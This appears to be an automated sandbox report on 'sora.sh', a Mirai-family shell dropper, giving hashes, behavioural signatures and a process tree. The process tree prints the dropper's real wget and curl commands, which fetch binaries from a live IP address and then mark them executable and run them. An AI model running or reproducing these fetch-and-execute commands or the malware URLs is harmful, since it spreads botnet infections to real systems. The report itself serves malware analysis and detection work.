Analysis
max time kernel: 150s
max time network: 151s
platform: debian-9_mips
resource: debian9-mipsbe-20240729-en
resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 29-08-2024 20:19
Static task: static1
Behavioral task: behavioral1
  Sample: sora.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: sora.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: sora.sh
  Resource: debian9-mipsbe-20240729-en
General
Target: sora.sh
Size: 1KB
MD5: 4bad6b7a8f3a112f1e8a64415b2c5e57
SHA1: 80386ebec3b511cd2a07da88e300a62590b8d889
SHA256: 4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
SHA512: da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted: mirai (LZRD)
Extracted: mirai (LZRD)
Signatures
Contacts a large (19828) amount of remote hosts  (1 TTPs)
  This may indicate a network scan to discover remotely running services.
Creates a large amount of network flows  (1 TTPs)
  This may indicate a network scan to discover remotely running services.
Executes dropped EXE  (10 IoCs)
  ioc          pid  Process
  /tmp/robben  744  robben
  /tmp/robben  752  robben
  /tmp/robben  763  robben
  /tmp/robben  774  robben
  /tmp/robben  796  robben
  /tmp/robben  823  robben
  /tmp/robben  831  robben
  /tmp/robben  849  robben
  /tmp/robben  873  robben
  /tmp/robben  879  robben
Modifies Watchdog functionality  (1 TTPs, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process
  File opened for modification  /dev/watchdog       robben
  File opened for modification  /dev/misc/watchdog  robben
YARA rule matches
  resource                         yara_rule
  behavioral3/files/fstream-1.dat  upx
  behavioral3/files/fstream-2.dat  upx
  behavioral3/files/fstream-3.dat  upx
  behavioral3/files/fstream-5.dat  upx
Reads runtime system information  (28 IoCs)
  Reads data from /proc virtual filesystem.
  description              ioc                            Process
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/713/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/722/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/679/exe                  robben
  File opened for reading  /proc/712/exe                  robben
  File opened for reading  /proc/715/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/756/exe                  robben
  File opened for reading  /proc/707/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/678/exe                  robben
  File opened for reading  /proc/694/exe                  robben
  File opened for reading  /proc/708/exe                  robben
  File opened for reading  /proc/796/exe                  robben
  File opened for reading  /proc/714/exe                  robben
  File opened for reading  /proc/753/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/676/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/719/exe                  robben
  File opened for reading  /proc/431/exe                  robben
  File opened for reading  /proc/672/exe                  robben
  File opened for reading  /proc/795/exe                  robben
Writes file to tmp directory  (20 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc             Process
  File opened for modification  /tmp/sora.mips  wget
  File opened for modification  /tmp/sora.mips  curl
  File opened for modification  /tmp/sora.mpsl  wget
  File opened for modification  /tmp/sora.arm4  curl
  File opened for modification  /tmp/sora.arm5  wget
  File opened for modification  /tmp/sora.m68k  wget
  File opened for modification  /tmp/sora.x86   curl
  File opened for modification  /tmp/sora.arm5  curl
  File opened for modification  /tmp/sora.arm7  wget
  File opened for modification  /tmp/sora.arm7  curl
  File opened for modification  /tmp/sora.ppc   wget
  File opened for modification  /tmp/sora.ppc   curl
  File opened for modification  /tmp/robben     sora.sh
  File opened for modification  /tmp/sora.sh4   wget
  File opened for modification  /tmp/sora.arm6  curl
  File opened for modification  /tmp/sora.mpsl  curl
  File opened for modification  /tmp/sora.arm6  wget
  File opened for modification  /tmp/sora.m68k  curl
  File opened for modification  /tmp/sora.sh4   curl
  File opened for modification  /tmp/sora.x86   wget
Processes
Format: PID, image path, command line, [signatures triggered]. Child processes of /tmp/sora.sh are indented under it.

PID 715  /tmp/sora.sh  /tmp/sora.sh  [Writes file to tmp directory]
  PID 717  /usr/bin/wget  wget http://154.216.17.67/bins/sora.x86  [Writes file to tmp directory]
  PID 729  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.x86  [Reads runtime system information; Writes file to tmp directory]
  PID 742  /bin/cat  cat sora.x86
  PID 743  /bin/chmod  chmod +x robben sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 744  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 747  /usr/bin/wget  wget http://154.216.17.67/bins/sora.mips  [Writes file to tmp directory]
  PID 749  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.mips  [Reads runtime system information; Writes file to tmp directory]
  PID 750  /bin/cat  cat sora.mips
  PID 751  /bin/chmod  chmod +x robben sora.mips sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 752  /tmp/robben  ./robben Payload  [Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information]
  PID 759  /usr/bin/wget  wget http://154.216.17.67/bins/sora.mpsl  [Writes file to tmp directory]
  PID 760  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.mpsl  [Reads runtime system information; Writes file to tmp directory]
  PID 761  /bin/cat  cat sora.mpsl
  PID 762  /bin/chmod  chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 763  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 765  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm4
  PID 766  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm4  [Reads runtime system information; Writes file to tmp directory]
  PID 771  /bin/cat  cat sora.arm4
  PID 772  /bin/chmod  chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 774  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 776  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm5  [Writes file to tmp directory]
  PID 784  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm5  [Reads runtime system information; Writes file to tmp directory]
  PID 793  /bin/cat  cat sora.arm5
  PID 794  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 796  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 798  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm6  [Writes file to tmp directory]
  PID 807  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm6  [Reads runtime system information; Writes file to tmp directory]
  PID 821  /bin/cat  cat sora.arm6
  PID 822  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 823  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 826  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm7  [Writes file to tmp directory]
  PID 828  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm7  [Reads runtime system information; Writes file to tmp directory]
  PID 829  /bin/cat  cat sora.arm7
  PID 830  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 831  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 833  /usr/bin/wget  wget http://154.216.17.67/bins/sora.ppc  [Writes file to tmp directory]
  PID 834  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.ppc  [Reads runtime system information; Writes file to tmp directory]
  PID 846  /bin/cat  cat sora.ppc
  PID 847  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 849  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 852  /usr/bin/wget  wget http://154.216.17.67/bins/sora.m68k  [Writes file to tmp directory]
  PID 860  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.m68k  [Reads runtime system information; Writes file to tmp directory]
  PID 871  /bin/cat  cat sora.m68k
  PID 872  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 873  /tmp/robben  ./robben Payload  [Executes dropped EXE]
  PID 875  /usr/bin/wget  wget http://154.216.17.67/bins/sora.sh4  [Writes file to tmp directory]
  PID 876  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.sh4  [Reads runtime system information; Writes file to tmp directory]
  PID 877  /bin/cat  cat sora.sh4
  PID 878  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
  PID 879  /tmp/robben  ./robben Payload  [Executes dropped EXE]
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 30KB
  MD5: bcff8f405bdd93b8488e6f6aca117a32
  SHA1: 8b32a1dea70be2c76830e3808f70ad62eb3b1250
  SHA256: 67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
  SHA512: 5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a
Filesize: 31KB
  MD5: 131fc41fbe66493277e3155f50b9fce5
  SHA1: 0bbb17cb882e34dc82e51862f8245f3187664beb
  SHA256: d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
  SHA512: de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247
Filesize: 33KB
  MD5: 8652e70ebc913d0078f59b2526a40d36
  SHA1: 1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
  SHA256: cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
  SHA512: ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3
Filesize: 212B
  MD5: 45e588171939a0780c48755918b1cd74
  SHA1: 6c33e64b1a43fb6752026fd1254cac740e7c3243
  SHA256: 770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
  SHA512: fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770
Filesize: 27KB
  MD5: 00d6529558e66184baaf1b0f21e59739
  SHA1: 3b9db5227c48f501573ea9b626c5c765a17e7c61
  SHA256: fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
  SHA512: 49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb
Filesize: 71KB
  MD5: a0b83eba33da68f09402235338d316a8
  SHA1: 15f3e890997e3b7f21c16eb1b0462bdf4ed11d61
  SHA256: eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
  SHA512: 2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79